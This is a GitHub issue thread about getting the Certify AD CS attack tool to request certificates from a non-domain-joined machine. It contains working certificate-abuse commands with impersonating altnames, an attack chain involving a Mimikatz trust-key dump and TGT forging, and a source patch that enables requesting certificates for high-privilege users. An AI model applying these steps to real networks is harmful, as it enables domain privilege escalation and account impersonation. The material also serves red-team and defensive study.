Not working in non domain computer

[puniaze]

Hi, Probably you already aware about problems related to running certify in non domain machine. Even if I tried different test cases (runas, netonly, ptt, cmd over pth) each time I got exception and I was not able to request certificate. Could you please recommend me what can I do for this in case if you don't plan any code updates for this issue?
Thanks

[git-oaktree]

Try the /domain and /ldapserver with the find function. E.g. certify.exe find /domain:github.com /ldapserver:4.2.2.2

[hypnoticpattern]

If you just need to query the ldap server you can do that from a non-domain joined machine using:

Runas /user:[email protected] /netonly powershell`

and then run the commands you need:

.\Certify.exe find /vulnerable /domain:corp.contoso.com /ldapserver:10.0.10.1

All the information about templates and permissions are correctly listed. The problem is when you need to request a certificate that Certify errors out:

PS C:\Users\User\Desktop\Tools> .\Certify.exe request /domain:corp.contoso.com /ca:ADCS01.corp.contoso.com\ContosoCA /template:"Copy of RAS and IAS Server" /altname:dad /subject:"CN=Low Privilege,CN=Users,DC=corp,DC=contoso,DC=com"

   _____          _   _  __
  / ____|        | | (_)/ _|
 | |     ___ _ __| |_ _| |_ _   _
 | |    / _ \ '__| __| |  _| | | |
 | |___|  __/ |  | |_| | | | |_| |
  \_____\___|_|   \__|_|_|  \__, |
                             __/ |
                            |___./
  v1.0.0

[*] Action: Request a Certificates

[*] Current user context    : WINDOWS10-TESTI\User

[*] Template                : Copy of RAS and IAS Server
[*] Subject                 : CN=Low Privilege,CN=Users,DC=corp,DC=contoso,DC=com
[*] AltName                 : dad

[!] Unhandled Certify exception:

System.Runtime.InteropServices.COMException (0x80094015): CertEnroll::CX509CertificateRequestPkcs10::InitializeFromPrivateKey: An enrollment policy server cannot be located. 0x80094015 (-2146877419 CERTSRV_E_NO_POLICY_SERVER)
   at CERTENROLLLib.CX509CertificateRequestPkcs10Class.InitializeFromPrivateKey(X509CertificateEnrollmentContext Context, IX509PrivateKey pPrivateKey, String strTemplateName)
   at Certify.Cert.CreateCertRequestMessage(String templateName, Boolean machineContext, String subjectName, String altName)
   at Certify.Cert.RequestCert(String CA, Boolean machineContext, String templateName, String subject, String altName, Boolean install)
   at Certify.Commands.Request.Execute(Dictionary`2 arguments)
   at Certify.CommandCollection.ExecuteCommand(String commandName, Dictionary`2 arguments)
   at Certify.Program.MainExecute(String commandName, Dictionary`2 parsedArgs)


Certify completed in 00:00:05.3014542

If I join the machine to the domain the same command succeed.

[bestrocker221]

I have the same problem, even on a runas netonly session, the certificate request takes the current user context (not the runas) in a non domain joined computer.
is there any way around this?

[heyquentin]

Same problem here too.

[NickYan7]

certipy (https://github.com/ly4k/Certipy) can solve this, which also work out with my issue on #27 .

e.g.

// ptt
certipy -u [email protected] -k -nopass -ca domain-ca -target dc.domain.com -template User -debug

[ken013194]

I hit the same issue too. While the scenario is a bit different where i am requesting the certificate from a trusted domain in a one way outbound trust environment. Would like to know if there are any workaround for certify. Certipy shall work but haven’t test out.

[GonZ0s]

I hit the same issue too. While the scenario is a bit different where i am requesting the certificate from a trusted domain in a one way outbound trust environment. Would like to know if there are any workaround for certify. Certipy shall work but haven’t test out.

I'm in the same boat. Did u figure out a solution yet?

[Eliotsehr]

Hello,

I ended up a similar situation and I think I found a solution so I'm sharing my experience in the hope that it helps.

My scenario was :

• I have Domain Admin access in Domain A which has a One-Way Outbound Trust with Domain B
• I dumped the shared key in the Trusted Domain Object using Mimikatz on Domain A DC
• I used that key to request a TGT for the Domain A trusted account the exists in Domain B
• I used that TGT to impersonate this user (let's say A$)

So I'm in a PTT session on a computer outside of Domain B and when I try to use Certify I have the same error saying that "An enrollment policy server cannot be located."

To fix this issue I ended up changing Certify source code in Cert.cs line 89 from :

objPkcs10.InitializeFromPrivateKey(context, privateKey, templateName);

To :

objPkcs10.InitializeFromPrivateKey(context, privateKey, "");

CX509ExtensionTemplateName templateExtension = new CX509ExtensionTemplateName();
templateExtension.InitializeEncode(templateName);
objPkcs10.X509Extensions.Add((CX509Extension)templateExtension);

Why does it work ? I have no clue but I saw similar issues on Stackoverflow so I gave it a shot and I was then able to request a certificate for a high privilege user, then a TGT, etc.

[Eliotsehr]

Hello Achmad, I dont exectly remember but I suppose that when I retrieved A$'s TGT I used the "Rubeus createprocess" method where you give Rubeus the TGT and it creates a process with that TGT. You can then steal the token of the newly created process to impersonate the user. This was all done through a Cobalt Strike beacon.

…

________________________________ De : achmad-yusuf ***@***.***> Envoyé : samedi 5 octobre 2024 16:48 À : GhostPack/Certify ***@***.***> Cc : Eliotsehr ***@***.***>; Comment ***@***.***> Objet : Re: [GhostPack/Certify] Not working in non domain computer (Issue #13) Hello, I ended up a similar situation and I think I found a solution so I'm sharing my experience in the hope that it helps. My scenario was : * I have Domain Admin access in Domain A which has a One-Way Outbound Trust with Domain B * I dumped the shared key in the Trusted Domain Object using Mimikatz on Domain A DC * I used that key to request a TGT for the Domain A trusted account the exists in Domain B * I used that TGT to impersonate this user (let's say A$) So I'm in a PTT session on a computer outside of Domain B and when I try to use Certify I have the same error saying that "An enrollment policy server cannot be located." To fix this issue I ended up changing Certify source code in Cert.cs line 89 from : objPkcs10.InitializeFromPrivateKey(context, privateKey, templateName); To : objPkcs10.InitializeFromPrivateKey(context, privateKey, ""); CX509ExtensionTemplateName templateExtension = new CX509ExtensionTemplateName(); templateExtension.InitializeEncode(templateName); objPkcs10.X509Extensions.Add((CX509Extension)templateExtension); Why does it work ? I have no clue but I saw similar issues on Stackoverflow so I gave it a shot and I was then able to request a certificate for a high privilege user, then a TGT, etc. hi Eliotsher you mention in point 4.I used that TGT to impersonate this user (let's say A$) what command that you used to impersonate A$? thanks — Reply to this email directly, view it on GitHub<#13 (comment)>, or unsubscribe<https://github.com/notifications/unsubscribe-auth/AJFGAYM6HW53YXCWNRJZ6ELZZ732HAVCNFSM6AAAAABPNNAIQCVHI2DSMVQWIX3LMV43OSLTON2WKQ3PNVWWK3TUHMZDGOJVGA4DCNRTGM>. You are receiving this because you commented.Message ID: ***@***.***>